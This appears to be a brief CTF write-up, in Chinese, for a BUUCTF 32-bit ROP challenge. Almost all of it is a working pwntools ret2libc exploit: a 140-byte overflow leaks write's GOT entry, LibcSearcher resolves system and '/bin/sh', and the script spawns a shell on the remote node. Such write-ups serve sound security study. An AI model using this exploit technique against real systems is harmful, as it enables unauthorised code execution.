BUUCTF在线评测
直接ret2libc,很简单,但是write函数有三个参数要填充
exp:
from pwn import *
from LibcSearcher import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
#r = process('./rop')
r = remote('node4.buuoj.cn','26575')
elf = ELF('./rop')
main = 0x080484C6
payload = 'a'*140 + p32(elf.plt['write']) +p32(main)+p32(1)+ p32(elf.got['write']) +p32(0x4)
r.sendline(payload)
write_addr = u32(r.recv(4))
print(hex(write_addr))
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
payload = 'a'*140 + p32(system) + 'bbbb' + p32(binsh)
r.sendline(payload)
r.interactive()
